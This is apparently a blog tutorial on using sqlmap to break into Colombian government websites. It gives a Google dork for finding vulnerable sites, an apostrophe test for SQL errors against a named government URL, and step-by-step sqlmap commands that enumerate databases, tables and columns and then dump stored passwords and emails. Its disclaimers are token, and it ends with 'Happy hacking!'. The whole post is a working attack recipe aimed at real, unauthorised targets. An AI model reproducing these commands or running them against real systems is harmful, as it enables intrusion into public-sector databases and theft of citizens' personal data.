How to use SQLMAP to Hack any website
Exploit risk is really high, mostly when it comes to talk about
government websites, Don’t know why they are not focusing on the
security of websites.
Here is Govt Website Hacking With Dork And Method
Note: don’t harm to any website, just do it for testing purposes & I’m not liable for your action, That’s your action.
SQL
Injection is really a big vulnerability for any website, Here I have
found a Colombian govt website dork which contains this vulnerability in
50+ websites.
The thing you need is Sqlmap which are running on Python3.7 (the latest version, you can use it in windows and Linux).
Now It’s time for dork to hack govt website
Here you have to understand the meaning of mentioned dork: intext (text which is available under websites) then keyword (what word inside contains), & last website extension (.com, org, net, gov) in the google you have to use this dork:
site.gov.in intext: php?id=intext:Powered By Plexo Torresoft Alex Torres Software site:gov.co
Intext: word which is inside the websiteSite: website extension (site: gov.co) is about government of Colombia.
Now open the URL’s through SERP (search engine rank page) and add Apostrophe (‘)at the end of the URL.
Vulnerability check: http://www.emviasbelen.gov.co/index.php?module=56'
The website data is hack able if you get error like this: A MySQL error has occurred, You have an error in your SQL syntax.
How To Hack A Govt Website Using SQLMAP
Let’s start hacking Database of the govt website using SQLMAP under 2 minutes
Sqlmap
can automatically enumerate the database and everything which you want
to the website, If you have good knowledge of SQL you can use Hackbar
add-on in Mozilla firefox.
Step 1- Open Sqlmap in CMD, if you are using windows
Use command: py (if python not working)
py sqlmap.py -u http://www.emviasbelen.gov.co/index.php?module=56 --dbs
It will automatically try SQL queries and injections, you don’t need to so anything.
Here I found over 30 databases in single govt website:
If you want to fetch tables of any database use this command:
py sqlmap.py -u http://www.emviasbelen.gov.co/index.php?module=56 -D databasename --tables
For columns
py sqlmap.py -u http://www.emviasbelen.gov.co/index.php?module=56 -D databasename -T tablename --columns
If want to dump the database mean need credentials or main data (password, emails) Use -
py sqlmap.py -u http://www.emviasbelen.gov.co/index.php?module=56 -D databasename -T tablename -C columnname --dump
Happy hacking!
Please don’t harm to any website or don’t hack any data for selling purposes.
Thank You, For Reading This Post
No comments
Please do not enter any spam link in comment box.